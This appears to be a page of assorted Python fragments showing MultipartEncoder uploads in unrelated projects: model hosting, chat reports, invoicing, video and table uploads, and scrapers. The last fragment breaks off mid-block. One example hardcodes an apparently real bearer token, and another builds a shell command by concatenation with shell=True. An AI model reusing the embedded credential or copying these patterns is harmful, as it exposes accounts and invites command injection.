    ):
        """ Hosts the model and optionally serves it using a Socket / REST API.

        Args:
            model : A jit model or Syft Plan.
            model_id (str): An integer/string representing the model id.
            If it isn't provided and the model is a Plan, model.id is used;
            if the model is a jit model, an exception is raised.
            allow_download (bool) : Allow to copy the model to run it locally.
            allow_remote_inference (bool) : Allow to run remote inferences.
        Returns:
            result (bool) : True if the model was served successfully.
        Raises:
            ValueError: model_id isn't provided and model is a jit model.
            RuntimeError: if there was a problem during model serving.
        """

        # If the model is a Plan we send the model
        # and host the plan version created after
        # the send action
        if isinstance(model, Plan):
            # We need to use the same id in the model
            # as in the POST request.
            pointer_model = model.send(self)
            res_model = pointer_model
        else:
            res_model = model

        serialized_model = serialize(res_model).decode(self.encoding)

        message = {
            REQUEST_MSG.TYPE_FIELD: REQUEST_MSG.HOST_MODEL,
            "encoding": self.encoding,
            "model_id": model_id,
            "allow_download": str(allow_download),
            "mpc": str(mpc),
            "allow_remote_inference": str(allow_remote_inference),
            "model": serialized_model,
        }

        url = self.address.replace("ws", "http") + "/serve-model/"

        # Multipart encoding
        form = MultipartEncoder(message)
        upload_size = form.len

        # Callback that shows upload progress
        def progress_callback(monitor):
            upload_progress = "{} / {} ({:.2f} %)".format(
                monitor.bytes_read, upload_size,
                (monitor.bytes_read / upload_size) * 100)
            print(upload_progress, end="\r")
            if monitor.bytes_read == upload_size:
                print()

        monitor = MultipartEncoderMonitor(form, progress_callback)
        headers = {
            "Prefer": "respond-async",
            "Content-Type": monitor.content_type
        }

        session = requests.Session()
        response = session.post(url, headers=headers, data=monitor).content
        session.close()
        return self._return_bool_result(json.loads(response))
Example #19
selected_user_file.close()

# Integration with Cisco Spark

filepath = '/home/debian/workingdir/Topolgyinfo.html'
filetype = 'text/html'
roomId = 'Y2lzY29zcGFyazovL3VzL1JPT00vNDk1OWQ4MzAtMThhNy0xMWU4LWI1MDktYjE2ZmRlMGU1M2Qx'
token = 'YjQ0NGJmMjctMWM5MS00NzI1LTkxZjgtZDFhZGI3MWI5MjY5NTc2NzRmMTYtODFh'
url = "https://api.ciscospark.com/v1/messages"

my_fields = {
    'roomId': roomId,
    'text': 'here is the latest Update of the Network',
    'files': ('Network Report', open(filepath, 'rb'), filetype)
}
m = MultipartEncoder(fields=my_fields)
r = requests.post(url,
                  data=m,
                  headers={
                      'Content-Type': m.content_type,
                      'Authorization': 'Bearer ' + token
                  })
filepath = '/home/debian/workingdir/EOSinfo.html'
my_fields = {
    'roomId': roomId,
    'text': 'here is the latest Update of the End Of Life/Support',
    'files': ('End of Support Infromation Report', open(filepath,
                                                        'rb'), filetype)
}
m = MultipartEncoder(fields=my_fields)
r = requests.post(url,
                  data=m,
                  headers={
                      'Content-Type': m.content_type,
                      'Authorization': 'Bearer ' + token
                  })
Example #20
def test_avs_multipart_decoder():
    unhandled_directive = deepcopy(fixtures.speak_one_directive)
    unhandled_directive['directive']['header']['name'] = 'SomethingElse'

    multipart_response = MultipartEncoder(
        fields=[
            (
                'diretive-one',
                (
                    'directive-one',
                    json.dumps(fixtures.speak_one_directive),
                    'application/json',
                ),
            ),
            (
                'directive-two',
                (
                    'directive-two',
                    json.dumps(fixtures.play_one_directive),
                    'application/json',
                ),
            ),
            (
                'directive-three',
                (
                    'directive-three',
                    json.dumps(fixtures.expect_speech_directive),
                    'application/json',
                ),
            ),
            (
                'directive-four',
                (
                    'directive-four',
                    json.dumps(unhandled_directive),
                    'application/json',
                ),
            ),
            (
                'directive-five',
                (
                    'directive-five',
                    fixtures.audio_response_data,
                    'application/octet-stream',
                    {
                        'Content-ID':
                        '<DailyBriefingPrompt.ChannelIntroduction.5c4c5f3e-0c0f-4dac-b0e0-ba70065b8bc0:Say:DAILYBRIEFING:DailyBriefingIntroduction_1708175498>'
                    },  # noqa
                )),
            (
                'directive-six',
                (
                    'directive-six',
                    fixtures.audio_response_data,
                    'application/octet-stream',
                    {
                        'Content-ID':
                        '<DeviceTTSRenderer_bf8529e6-0708-4ac3-93a0-e57b0aff5ef4_1934409815>'
                    },  # noqa
                ))
        ], )

    response = mock.Mock(
        headers={
            'access-control-allow-origin': '*',
            'x-amzn-requestid': '06aaf3fffec6be28-00003161-00006c28',
            'content-type': [bytes(multipart_response.content_type, 'utf8')],
        },
        **{'read.return_value': multipart_response.to_string()},
    )

    directives = helpers.AVSMultipartDecoder(response=response).directives

    directive = next(directives)
    assert directive.name == 'Speak'
    assert isinstance(directive, helpers.SpeakDirective)

    directive = next(directives)
    assert directive.name == 'Play'
    assert isinstance(directive, helpers.PlayDirective)

    directive = next(directives)
    assert directive.name == 'ExpectSpeech'
    assert isinstance(directive, helpers.ExpectSpeechDirective)

    directive = next(directives)
    assert directive.name == 'SomethingElse'
    assert isinstance(directive, helpers.Directive)
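
Note: the test above splits the multipart response with a project-specific AVSMultipartDecoder. For comparison, a minimal sketch of the same round trip using requests_toolbelt's own MultipartDecoder (the field contents here are made up):

from requests_toolbelt import MultipartEncoder
from requests_toolbelt.multipart.decoder import MultipartDecoder

encoded = MultipartEncoder(fields={
    'directive-one': ('directive-one', '{"header": {"name": "Speak"}}',
                      'application/json'),
    'directive-two': ('directive-two', b'\x00\x01\x02',
                      'application/octet-stream'),
})
decoder = MultipartDecoder(encoded.to_string(), encoded.content_type)
for part in decoder.parts:
    # each part exposes its own .headers and raw .content bytes
    print(len(part.content))
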
Example #21
    def go_on_run(self,i):
        pass_count = []
        fail_count = []
        request_data_file = ''
        res = None
        # get the number of test cases
        rows_count = self.data.get_case_lines()
        # the first row has index 0
        # for i in range(1, rows_count):
        is_run = self.data.get_is_run(i)
        if is_run:
            url = self.data.get_request_url(i)
            method = self.data.get_request_method(i)
            #request_data = json.load(self.data.get_request_data(i))
            expect = self.data.get_expcet_data(i)
            token = self.data.is_token(i)
            depend_case = self.data.is_depend(i)
            headers= self.data.get_headers(i)
            r = self.data.get_request_data(i)
            self.data.write_respond_data(i, '')  # clear the stored response


            # handle file-upload requests
            if r!=None:
                if r.endswith('jpg') or r.endswith('png') or r.endswith('docx') or r.endswith('doc') or r.endswith('ppt') or r.endswith('pptx'):  # other file types are not handled yet
                    log().info('读取上传文件')
                    file_payload = {'file': (r, open('../' + r, 'rb'))}#, "image/jpg"
                    m = MultipartEncoder(file_payload)
                    headers['Content-Type'] = m.content_type
                    request_data = m
                    log().info('生成上传文件Multipart')
                # handle dependent test cases
                elif depend_case != None:
                    self.depend_data = DependentData(depend_case)
                    # get the dependency keys and values [id1:3]
                    depend_response_data = self.depend_data.get_data_for_key(i)  # {caseid:{id1:1,id2:2}}
                    for caseid in depend_response_data:
                        for k in depend_response_data[caseid]:
                            y = '${' + caseid + ',' + k + '}'
                            if r.find(y):
                                t = r.replace(y, str(depend_response_data[caseid][k]))
                                r = t
                    log().info('依赖(最终)请求拼接完成\n%s', r)
                    request_data = json.loads(r, encoding='utf-8')

                else:  # no dependency, just parse the request data
                        log().info('获取没有依赖的请求参数\n%s',r)
                        request_data =json.loads(r,encoding='utf-8')

            else:
                request_data={}

            # if the token field is 'write', save the token returned by this API to token.json; if it is 'yes', read it back from token.json
            if token == "write":
                log().info('写入token')
                res = self.run_method.run_main(method, url,request_data,headers)
                op_header = OperationHeader(res)
                op_header.write_token()
            elif token == 'yes':
                op_json = OperationJson("../dataconfig/token.json")
                token = op_json.get_data('data')
                log().info("获取token\n%s",token)
                headers.update(token)
                #request_data = dict(request_data, **token)  # merge the login token into the request data and use it as the request payload
                res = self.run_method.run_main(method, url,request_data,headers)

            else:

                res = self.run_method.run_main(method, url,request_data,headers)
            log().info("响应结果\n%s", res)
            self.data.write_respond_data(i, res)

            if expect != None:
                if self.com_util.is_contain(expect, res):
                    self.data.write_result(i, "Pass")
                    pass_count.append(i)

                else:
                    self.data.write_result(i, "failed")
                    fail_count.append(i)

            else:

                log().error('用例ID:case-%s,预期结果不能为空',i)

            return res
Example #22
 # get all market names
 option = BeautifulSoup(get_cookie.content, 'lxml')
 option = option.find_all('option')
 PASARAN = [a['value'] for a in option]
 # get the cookie for the request
 cookies = get_cookie.cookies.get_dict()
 names = [f'{k}={v};'for k, v in cookies.items()]
 COOKIE = ''.join(names)
 kumpulan_param = []
 dari = input('FROM: YYYY-mm-dd\nCONTOH:2020-03-01\n>')
 sampai = input('TO: YYYY-mm-dd\nCONTOH:2020-03-18\n>')
 print('pastikan tanggal sampai > tanggal')
 for pasar in PASARAN:
     params=MultipartEncoder({
         "JessicaVe48": cookies['ArfNet48'],
         "from-tbl": dari,
         "to-tbl": sampai,
         "psr-tbl": pasar})
     headers = {
         "Host": "disperdagin.surabaya.go.id",
         "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36",
         "Accept": "application/json, text/javascript, */*; q=0.01",
         "Content-Length": "42",
         "Accept-Language": "en-US,en;q=0.5",
         "Accept-Encoding": "gzip, deflate",
         "Referer": "http://disperdagin.surabaya.go.id/bahanpokok/tabel",
         # my main problem: it does not take a JSON request like a normal website but uses multipart/form-data, so the payload has to be "converted" first
         "Content-Type": params.content_type,
         "Cookie": COOKIE,
         "DNT": "1",
         "X-Requested-With": "XMLHttpRequest",
Example #23
def facturar(contrato_id, descripcion=None, sub_total=None):
    logger.info('Task facturar iniciada')

    # Configure rounding
    getcontext().rounding = ROUND_HALF_UP

    # Get the current date
    fecha = timezone.localtime()

    # Look up the contract
    contrato = models.Contrato.objects.get(id=contrato_id)

    # If no description is provided, invoice the month corresponding to the current date
    if descripcion is None:
        sub_total = contrato.precio_mensual
        descripcion = u'Renta correspondiente al mes {0} del {1} {2}'.format(
            nombre_mes(fecha.month), fecha.year, contrato.nombre_predio)

    # Compute taxes
    iva_tra = (sub_total * Decimal('0.160000')).quantize(TWO_PLACES)
    iva_ret = Decimal('0.00')
    isr_ret = Decimal('0.00')

    if contrato.retener_impuestos:
        iva_ret = (sub_total * Decimal('0.106666')).quantize(TWO_PLACES)
        isr_ret = (sub_total * Decimal('0.100000')).quantize(TWO_PLACES)

    total_tra = iva_tra
    total_ret = (iva_ret + isr_ret).quantize(TWO_PLACES)
    total = ((sub_total + total_tra) - total_ret).quantize(TWO_PLACES)

    # Load the CSD certificate
    cer = X509.load_cert(settings.CSD_CER, X509.FORMAT_DER)

    # Load the CSD private key
    key = RSA.load_key(settings.CSD_KEY)

    # Get the certificate serial number
    serial_number = '{:x}'.format(int(cer.get_serial_number())).decode('hex')

    # Get the folio
    folio_conf = models.Configuracion.objects.get(nombre='U_FOLIO')
    folio_conf.valor = folio_conf.valor + 1
    folio_conf.save()

    nsmap = {
        'cfdi': 'http://www.sat.gob.mx/cfd/3',
        'xsi': 'http://www.w3.org/2001/XMLSchema-instance',
    }

    attrib = {
        '{http://www.w3.org/2001/XMLSchema-instance}schemaLocation':
        'http://www.sat.gob.mx/cfd/3'
    }

    # cfdi:Comprobante node
    cfdi = etree.Element('{http://www.sat.gob.mx/cfd/3}Comprobante',
                         nsmap=nsmap,
                         attrib=attrib)

    cfdi.set('Version', '3.3')
    cfdi.set('Serie', settings.SERIE)
    cfdi.set('Folio', str(folio_conf.valor))
    cfdi.set('Fecha', fecha.isoformat()[:19])
    cfdi.set('FormaPago', contrato.forma_pago)
    cfdi.set('NoCertificado', serial_number)
    cfdi.set('Certificado', base64.b64encode(cer.as_der()))
    cfdi.set('SubTotal', '{}'.format(sub_total))
    cfdi.set('Moneda', settings.MONEDA)
    cfdi.set('Total', '{}'.format(total))
    cfdi.set('TipoDeComprobante', 'I')
    cfdi.set('MetodoPago', contrato.metodo_pago)
    cfdi.set('LugarExpedicion', settings.CODIGO_POSTAL)

    # cfdi:Emisor node
    emisor = etree.SubElement(cfdi, '{http://www.sat.gob.mx/cfd/3}Emisor')
    emisor.set('Rfc', settings.RFC)
    emisor.set('Nombre', settings.RAZON_SOCIAL)
    emisor.set('RegimenFiscal', settings.REGIMEN_FISCAL)

    # cfdi:Receptor node
    receptor = etree.SubElement(cfdi, '{http://www.sat.gob.mx/cfd/3}Receptor')
    receptor.set('Rfc', contrato.rfc_cliente)
    receptor.set('Nombre', contrato.nombre_cliente)
    receptor.set('UsoCFDI', contrato.uso_cfdi)

    # cfdi:Conceptos node
    conceptos = etree.SubElement(cfdi,
                                 '{http://www.sat.gob.mx/cfd/3}Conceptos')

    # cfdi:Concepto node
    concepto = etree.SubElement(conceptos,
                                '{http://www.sat.gob.mx/cfd/3}Concepto')
    concepto.set('ClaveProdServ', settings.CLAVE_PROD_SERV)
    concepto.set('Cantidad', '1')
    concepto.set('ClaveUnidad', settings.CLAVE_UNIDAD)
    concepto.set('Descripcion', descripcion)
    concepto.set('ValorUnitario', '{}'.format(sub_total))
    concepto.set('Importe', '{}'.format(sub_total))

    # cfdi:Impuestos node
    impuestos = etree.SubElement(concepto,
                                 '{http://www.sat.gob.mx/cfd/3}Impuestos')

    # cfdi:Traslados node
    traslados = etree.SubElement(impuestos,
                                 '{http://www.sat.gob.mx/cfd/3}Traslados')

    # cfdi:Traslado node
    traslado = etree.SubElement(traslados,
                                '{http://www.sat.gob.mx/cfd/3}Traslado')
    traslado.set('Base', '{}'.format(sub_total))
    traslado.set('Impuesto', '002')
    traslado.set('TipoFactor', 'Tasa')
    traslado.set('TasaOCuota', '0.160000')
    traslado.set('Importe', '{}'.format(iva_tra))

    if contrato.retener_impuestos:
        # cfdi:Retenciones node
        retenciones = etree.SubElement(
            impuestos, '{http://www.sat.gob.mx/cfd/3}Retenciones')

        # cfdi:Retencion node (IVA)
        traslado = etree.SubElement(retenciones,
                                    '{http://www.sat.gob.mx/cfd/3}Retencion')
        traslado.set('Base', '{}'.format(sub_total))
        traslado.set('Impuesto', '002')
        traslado.set('TipoFactor', 'Tasa')
        traslado.set('TasaOCuota', '0.106666')
        traslado.set('Importe', '{}'.format(iva_ret))

        # cfdi:Retencion node (ISR)
        retencion = etree.SubElement(retenciones,
                                     '{http://www.sat.gob.mx/cfd/3}Retencion')
        retencion.set('Base', '{}'.format(sub_total))
        retencion.set('Impuesto', '001')
        retencion.set('TipoFactor', 'Tasa')
        retencion.set('TasaOCuota', '0.100000')
        retencion.set('Importe', '{}'.format(isr_ret))

    if contrato.cuenta_predial is not None:
        cuenta_predial = etree.SubElement(
            concepto, '{http://www.sat.gob.mx/cfd/3}CuentaPredial')
        cuenta_predial.set('Numero', str(contrato.cuenta_predial))

    # cfdi:Impuestos node
    impuestos = etree.SubElement(cfdi,
                                 '{http://www.sat.gob.mx/cfd/3}Impuestos')
    impuestos.set('TotalImpuestosTrasladados', '{}'.format(total_tra))

    if contrato.retener_impuestos:
        impuestos.set('TotalImpuestosRetenidos', '{}'.format(total_ret))

        # cfdi:Retenciones node
        retenciones = etree.SubElement(
            impuestos, '{http://www.sat.gob.mx/cfd/3}Retenciones')

        # cfdi:Retencion node (IVA)
        retencion_iva = etree.SubElement(
            retenciones, '{http://www.sat.gob.mx/cfd/3}Retencion')
        retencion_iva.set('Impuesto', '002')
        retencion_iva.set('Importe', '{}'.format(iva_ret))

        # cfdi:Retencion node (ISR)
        retencion_isr = etree.SubElement(
            retenciones, '{http://www.sat.gob.mx/cfd/3}Retencion')
        retencion_isr.set('Impuesto', '001')
        retencion_isr.set('Importe', '{}'.format(isr_ret))

    # cfdi:Traslados node
    traslados = etree.SubElement(impuestos,
                                 '{http://www.sat.gob.mx/cfd/3}Traslados')

    # cfdi:Traslado node
    traslado_iva = etree.SubElement(traslados,
                                    '{http://www.sat.gob.mx/cfd/3}Traslado')
    traslado_iva.set('Impuesto', '002')
    traslado_iva.set('TipoFactor', 'Tasa')
    traslado_iva.set('TasaOCuota', '0.160000')
    traslado_iva.set('Importe', '{}'.format(iva_tra))

    # Load the XSLT used to build the original string (cadena original)
    xslt = etree.XSLT(etree.parse(settings.PATH_XLST))

    # Generate the original string
    cadena_original = xslt(cfdi)

    # Hash the original string
    digest = hashlib.new('sha256', str(cadena_original)).digest()

    # Sign the digest of the original string
    sign = key.sign(digest, "sha256")

    # Encode the signature (sello) from bytes to base64
    sello = base64.b64encode(sign)

    # Add the sello to the XML document
    cfdi.set('Sello', sello)

    # Serialize the XML document
    xml = etree.tostring(cfdi, pretty_print=True)

    # Format token
    token = 'bearer %s' % str(settings.PAC_TOKEN)

    # Build the multipart message that attaches the file
    m = MultipartEncoder(fields={
        'xml': ('xml', xml, 'text/xml', {
            'Content-Transfer-Encoding': 'binary'
        })
    })

    # Build the headers
    headers = {'Content-Type': m.content_type, 'Authorization': token}

    # POST the request to the PAC
    req = requests.post(settings.PAC_URL, headers=headers, data=m.to_string())

    # Check the response
    if req.status_code != 200:
        raise Exception(u'id_contrato: {} Error {}'.format(
            contrato.id, req.json()))

    # Extract the XML
    xml_timbrado = req.json()['data']['cfdi'].encode('utf-8')

    # Parse the stamped XML
    cfdi_timbrado = etree.fromstring(xml_timbrado)

    # Find the UUID
    uuid = cfdi_timbrado.find('{http://www.sat.gob.mx/cfd/3}Complemento').find(
        '{http://www.sat.gob.mx/TimbreFiscalDigital}TimbreFiscalDigital'
    ).attrib.get('UUID')

    # Generate the PDF
    xml_dict = xmltodict.parse(xml_timbrado)['cfdi:Comprobante']

    cbb_url = 'https://verificacfdi.facturaelectronica.sat.gob.mx/' \
              'default.aspx?id={0}re={1}&rr={2}&tt={3}&fe={4}'.format(
        uuid,
        settings.RFC,
        contrato.rfc_cliente,
        total,
        sello[(len(sello) - 8):],
    )

    # Generate the CBB QR code
    qrdata = qrcode.make(cbb_url)
    raw = StringIO()
    qrdata.save(raw)
    cbb = b64encode(raw.getvalue())

    # Render the HTML
    html = get_template('webapp/factura-pdf.html').render({
        'xml': xml_dict,
        'cadena_original': cadena_original,
        'cbb': cbb,
    })

    # Generate the PDF
    pdf = pdfkit.from_string(html,
                             False,
                             options={
                                 'page-size': 'Letter',
                                 'encoding': "UTF-8",
                                 'quiet': '',
                             })

    # Save the invoice to the database
    factura = models.Factura()
    factura.fecha = fecha
    factura.contrato = contrato
    factura.uuid = uuid
    factura.serie = settings.SERIE
    factura.folio = folio_conf.valor
    factura.nombre_cliente = contrato.nombre_cliente
    factura.rfc_cliente = contrato.rfc_cliente
    factura.correo_cliente = contrato.correo_cliente
    factura.concepto = descripcion
    factura.sub_total = sub_total
    factura.iva_trasladado = iva_tra
    factura.iva_retenido = iva_ret
    factura.isr_retenido = isr_ret
    factura.total = total
    factura.xml = ContentFile(xml_timbrado, name='{0}.xml'.format(uuid))
    factura.pdf = ContentFile(pdf, name='{0}.pdf'.format(uuid))
    factura.save()

    # Add the total to the contract balance
    contrato.saldo_contrato = contrato.saldo_contrato + total
    contrato.save()

    # Send the email
    html_email = get_template('webapp/factura-correo.txt').render(
        {'factura': factura})

    msg = EmailMessage('{} Nueva Factura {} {} Generada'.format(
        settings.RAZON_SOCIAL, factura.serie, factura.folio),
                       html_email,
                       settings.DEFAULT_FROM_EMAIL,
                       to=[factura.correo_cliente],
                       reply_to=[settings.TENANT_EMAIL],
                       cc=[settings.TENANT_EMAIL])
    msg.attach('{}_{}.xml'.format(factura.serie, factura.folio),
               factura.xml.read(), 'application/xml')
    msg.attach('{}_{}.pdf'.format(factura.serie, factura.folio),
               factura.pdf.read(), 'application/pdf')
    msg.send()

    logger.info('Task facturar terminada')

    return factura.id
Example #24
def create_articles(title,
                    type,
                    content,
                    account_id=None,
                    attention_period_in_days=None):
    """
    Create articles.

        reference
        - `Common Message Property <https://developers.worksmobile.com/jp/document/100180301?lang=en>`_
    """

    headers = {"charset": "UTF-8", "consumerKey": OPEN_API["consumerKey"]}

    board_no = get_value("{type}board".format(type=type), None)
    if board_no is None:
        logging.error("create articles. board no is None.")
        raise HTTPError(500, "create articles. board no is None.")

    body = {
        "title": title,
        "body": content,
        "boardNo": board_no,
        "domainId": DOMAIN_ID,
        "sendCreatedNotify": True,
        "useComment": True
    }

    if account_id is not None:
        body["accountId"] = account_id

    if attention_period_in_days is not None:
        body["attentionPeriodInDays"] = attention_period_in_days

    multi1 = MultipartEncoder(fields={"article": (None, json.dumps(body))})

    headers['content-type'] = multi1.content_type
    boards_url = API_BO["home"]["create_articles_url"]

    response = auth_post(boards_url, data=multi1, headers=headers)

    if response.status_code != 200 or response.content is None:
        logging.info(
            "create articles failed. url:%s text:%s headers:%s body:%s",
            boards_url, response.text, json.dumps(headers), multi1.to_string())
        if response.status_code == 400:
            logging.error(
                "create articles failed. url:%s text:%s headers:%s body:%s",
                boards_url, response.text, json.dumps(headers),
                json.dumps(body))
            return create_articles_failed()
        if response.status_code == 507:
            return storage_lack()
        logging.error(
            "create articles failed. url:%s text:%s headers:%s body:%s",
            boards_url, response.text, json.dumps(headers), multi1.to_string())
        raise HTTPError(500, "create articles. http return code error.")

    tmp_req = json.loads(response.content)
    article_no = tmp_req.get("articleNo", None)
    if article_no is None:
        logging.error("create articles failed. url:%s text:%s", boards_url,
                      response.text)
        raise HTTPError(500, "create articles. article no is None.")
    return None
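A minimal usage sketch for create_articles above; the board type string, the 7-day attention period and the wrapper function shown here are assumptions for illustration, not part of the original module.

def post_notice(title, content):
    # Hypothetical caller: publish a notice and surface API failures.
    # "free" as the board type key is an example value only.
    try:
        return create_articles(title=title,
                               type="free",
                               content=content,
                               attention_period_in_days=7)
    except HTTPError as err:
        logging.error("notice was not created: %s", err)
        raise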
Пример #25
0
    def upload(self,
               video_file,
               title,
               description,
               categories,
               tags,
               is_private,
               callback=None,
               session=None,
               proxy=None,
               **kwargs):

        session = session or self.http_settings.session
        proxy = proxy or self.http_settings.proxy

        no_tags = kwargs.get('no_tags', False)
        add_content_source_id = kwargs.get('add_content_source_id', False)

        my_video_upload_url = 'http://www.{domain}/my_video_upload/'.format(
            domain=self.domain)

        go_to_upload = session.get(my_video_upload_url, proxies=proxy)

        doc = etree.fromstring(go_to_upload.content, HTMLParser())

        filehash = self._upload_video(video_file, callback, session, proxy)

        fields = []
        if add_content_source_id:
            found_content_source_id = doc.xpath(
                '//input[@name="content_source_id"]/@value')
            if not found_content_source_id:
                raise NginxUploaderProblem(
                    'Cannot find required variable content_source_id')
            content_source_id = found_content_source_id[0]
            fields.append(('content_source_id', str(content_source_id)))

        if not no_tags:
            fields.append(('tags', str(",".join([tag for tag in tags]))))
        fields.append(('action', 'add_new_complete'))
        fields.append(('title', str(title)))
        fields.append(('description', str(description)))
        fields.append(('file', str(path.Path(video_file).name)))
        fields.append(('file_hash', str(filehash)))
        fields.append(('is_private', "1" if is_private else "0"))

        for category in categories:
            fields.append(('category_ids[]', str(category)))
        encoder = MultipartEncoder(fields)

        if callback:
            monitor = MultipartEncoderMonitor(encoder, callback)
        else:
            monitor = MultipartEncoderMonitor(encoder)

        #my_video_upload_url = 'http://httpbin.org/post'
        submit_video = session.post(
            my_video_upload_url,
            data=monitor,
            proxies=proxy,
            headers={'Content-Type': monitor.content_type})
Пример #26
0
    def uploadVideo(self,
                    video,
                    caption=None,
                    upload_id=None,
                    frame_time_thumbnail=0):
        '''
        Uploads a video to Instagram creating in the process a thumbnail at the frame_time_thumbnail time
        '''
        if upload_id is None:
            upload_id = str(int(time.time() * 1000))
        data = {
            'upload_id': upload_id,
            '_csrftoken': self.token,
            'media_type': '2',
            '_uuid': self.uuid,
        }
        m = MultipartEncoder(data, boundary=self.uuid)
        self.s.headers.update({
            'X-IG-Capabilities': '3Q4=',
            'X-IG-Connection-Type': 'WIFI',
            'Host': 'i.instagram.com',
            'Cookie2': '$Version=1',
            'Accept-Language': 'en-US',
            'Accept-Encoding': 'gzip, deflate',
            'Content-type': m.content_type,
            'Connection': 'keep-alive',
            'User-Agent': self.USER_AGENT
        })
        response = self.s.post(self.API_URL + "upload/video/",
                               data=m.to_string())
        if response.status_code == 200:
            body = json.loads(response.text)
            upload_url = body['video_upload_urls'][3]['url']
            upload_job = body['video_upload_urls'][3]['job']

            videoData = open(video, 'rb').read()
            request_size = math.floor(len(videoData) / 4)
            lastRequestExtra = (len(videoData) - (request_size * 3))

            headers = copy.deepcopy(self.s.headers)
            self.s.headers.update({
                'X-IG-Capabilities': '3Q4=',
                'X-IG-Connection-Type': 'WIFI',
                'Cookie2': '$Version=1',
                'Accept-Language': 'en-US',
                'Accept-Encoding': 'gzip, deflate',
                'Content-type': 'application/octet-stream',
                'Session-ID': upload_id,
                'Connection': 'keep-alive',
                'Content-Disposition': 'attachment; filename="video.mov"',
                'job': upload_job,
                'Host': 'upload.instagram.com',
                'User-Agent': self.USER_AGENT
            })
            for i in range(0, 4):
                start = i * request_size
                if i == 3:
                    end = i * request_size + lastRequestExtra
                else:
                    end = (i + 1) * request_size
                length = lastRequestExtra if i == 3 else request_size
                content_range = "bytes {start}-{end}/{lenVideo}".format(
                    start=start, end=(end - 1),
                    lenVideo=len(videoData)).encode('utf-8')

                self.s.headers.update({
                    'Content-Length': str(end - start),
                    'Content-Range': content_range,
                })
                response = self.s.post(upload_url,
                                       data=videoData[start:start + length])
            self.s.headers = headers

            if response.status_code == 200:
                if self.configureVideo(upload_id, video, frame_time_thumbnail,
                                       caption):
                    self.expose()
                    return True
        return False
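A hedged usage sketch for the method above; `api` stands for an already logged-in client instance and the file path is a placeholder.

# Hypothetical call: upload a clip and take the thumbnail from the frame at 2.5 s.
api.uploadVideo("clips/demo.mp4", caption="demo clip", frame_time_thumbnail=2.5)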
Пример #27
0
def seltabup(dirc, uname, destination):
    ee.Initialize()
    for (root, directories, files) in os.walk(dirc):
        for filename in files:
            if filename.endswith(".zip"):
                table_exists.append(filename.split(".zip")[0])
    try:
        destination_info = ee.data.getAsset(destination + "/")
        full_path_to_collection = destination_info["name"]
        if destination_info["name"] and destination_info["type"].lower(
        ) == "folder":
            print("Folder exists: {}".format(destination_info["id"]))
            children = ee.data.listAssets({"parent": full_path_to_collection})
            for child in children["assets"]:
                gee_table_exists.append(child["id"].split("/")[-1])
    except Exception as e:
        full_path_to_collection = (destination.rsplit("/", 1)[0] + "/" +
                                   destination.split("/")[-1])
        print("Creating a folder {}".format(full_path_to_collection))
        try:
            ee.data.createAsset({"type": ee.data.ASSET_TYPE_FOLDER_CLOUD},
                                full_path_to_collection)
        except:
            ee.data.createAsset({"type": ee.data.ASSET_TYPE_FOLDER},
                                full_path_to_collection)
    diff_set = set(table_exists) - set(gee_table_exists)
    if len(diff_set) != 0:
        options = Options()
        options.add_argument("-headless")
        passw = getpass.getpass()
        if os.name == "nt":
            driver = Firefox(executable_path=os.path.join(
                lp, "geckodriver.exe"),
                             options=options)
        else:
            driver = Firefox(executable_path=os.path.join(lp, "geckodriver"),
                             options=options)
        try:
            # Using stackoverflow for third-party login & redirect
            driver.get(
                "https://stackoverflow.com/users/signup?ssrc=head&returnurl=%2fusers%2fstory%2fcurrent%27"
            )
            time.sleep(5)
            driver.find_element_by_xpath(
                '//*[@id="openid-buttons"]/button[1]').click()
            time.sleep(5)
            driver.find_element_by_xpath('//input[@type="email"]').send_keys(
                uname)
            driver.find_element_by_xpath("//div[@id='identifierNext']").click()
            time.sleep(5)
            driver.find_element_by_xpath(
                '//input[@type="password"]').send_keys(passw)
            driver.find_element_by_xpath('//*[@id="passwordNext"]').click()
            time.sleep(5)
            driver.get("https://code.earthengine.google.com")
            time.sleep(8)
        except Exception as e:
            print(e)
            driver.close()
            sys.exit("Failed to setup & use selenium")
        cookies = driver.get_cookies()
        s = requests.Session()
        for cookie in cookies:
            s.cookies.set(cookie["name"], cookie["value"])
        driver.close()
        auth_check = s.get("https://code.earthengine.google.com")
        if auth_check.status_code == 200:
            try:
                i = 1
                file_count = len(diff_set)
                for item in list(diff_set):
                    full_path_to_table = os.path.join(root, item + ".zip")
                    file_name = item + ".zip"
                    asset_full_path = full_path_to_collection + "/" + item.split(
                        ".")[0]
                    r = s.get(
                        "https://code.earthengine.google.com/assets/upload/geturl"
                    )
                    d = ast.literal_eval(r.text)
                    upload_url = d["url"]
                    with open(full_path_to_table, "rb") as f:
                        upload_url = d["url"]
                        try:
                            m = MultipartEncoder(
                                fields={"zip_file": (file_name, f)})
                            resp = s.post(
                                upload_url,
                                data=m,
                                headers={"Content-Type": m.content_type},
                            )
                            gsid = resp.json()[0]
                            asset_full_path = (full_path_to_collection + "/" +
                                               item.split(".")[0])
                            main_payload = {
                                "name":
                                asset_full_path,
                                "sources": [{
                                    "charset": "UTF-8",
                                    "maxErrorMeters": 1,
                                    "maxVertices": 1000000,
                                    "uris": [gsid],
                                }],
                            }
                            with open(os.path.join(lp, "data.json"),
                                      "w") as outfile:
                                json.dump(main_payload, outfile)
                            output = subprocess.check_output(
                                "earthengine upload table --manifest " + '"' +
                                os.path.join(lp, "data.json") + '"',
                                shell=True,
                            )
                            print(
                                "Ingesting " + str(i) + " of " +
                                str(file_count) + " " +
                                str(os.path.basename(asset_full_path)) +
                                " Task Id: " +
                                output.decode("ascii").strip().split(" ")[-1])
                        except Exception as e:
                            print(e)
                        i = i + 1
            except Exception as e:
                print(e)
            except (KeyboardInterrupt, SystemExit) as e:
                sys.exit("Program escaped by User")
        else:
            print("Authentication Failed for GEE account")
    elif len(diff_set) == 0:
        print("All assets already copied")
Пример #28
0
def main():

    with open('Stat1.csv') as file:
        reader = csv.DictReader(file)
        count = 0
        for row in reader:
            try:
                if count == 0:
                    print("Page loaded")
                    count += 1

                proxies = {
                    "http":
                    "http://" + row['User'] + ":" + row['Auth'] + "@" +
                    row['IP'] + ":" + row['Port'] + "/",
                    "https":
                    "http://" + row['User'] + ":" + row['Auth'] + "@" +
                    row['IP'] + ":" + row['Port'] + "/"
                }

                headers1 = {
                    'User-Agent':
                    'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'
                }

                with requests.Session() as session:
